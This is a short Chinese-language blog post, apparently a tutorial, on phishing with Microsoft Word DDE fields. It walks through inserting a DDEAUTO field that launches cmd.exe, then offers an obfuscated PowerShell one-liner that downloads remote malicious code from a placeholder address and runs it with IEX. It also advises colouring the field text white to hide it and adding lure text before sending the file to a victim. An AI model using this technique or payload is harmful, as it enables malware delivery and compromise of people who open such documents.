Office钓鱼攻击之DDE

2021-10-13  本文已影响0人  走错说爱你

通过Windows的office,可以实施许多钓鱼攻击,这里对其中的DDE恶意程序进行钓鱼攻击,通过代码调用受害者本地程序。

最终实现效果如下:


实现效果

环境

文中使用的环境如下(可采用其他版本的系统和office):
攻击机:

相关知识

钓鱼文件准备

新建一个Word文件,打开,依次点击插入->文档部件->

插入域
在弹出的对话框中点击确定:
点击确定
可以看到如下所示界面,显示!异常的公式结尾
插入之后
右键单击,选择切换域代码
右键单击
变成如图所示的样子:
切换域代码
删掉= \* MERGEFORMAT,输入代码:
DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" 
输入代码

其中的代码可以换成更加复杂的语句,例如:

DDEAUTO  "C:\\Programs\\Microsoft\\Office\\MSWord\\..\\..\\..\\..\\..\\Windows\\system32\\cmd.exe /c 
pOWeRShELl.exe  -NoP -W Hidden IEX(nEw-oBjECt sYstEM.nEt.wEBcLIeNt).dOWnLoADsTRiNg('http://远程恶意代码文件地址'); 

该语句将从远程下载恶意代码,并使用powershell执行。
然后保存即可(为了钓鱼效果,可在该行代码前添加诱导性语句,将该行文字颜色改成白色以掩盖痕迹)。

攻击实施

将文件发给受害者,当受害者在靶机打开文件时,出现弹窗警告:


弹窗

选择是,接着出现下一个弹窗:


下一个弹窗
选择是,就可以看到本地计算器程序被唤起,恶意代码执行成功:
执行成功

参考链接

上一篇下一篇

猜你喜欢

热点阅读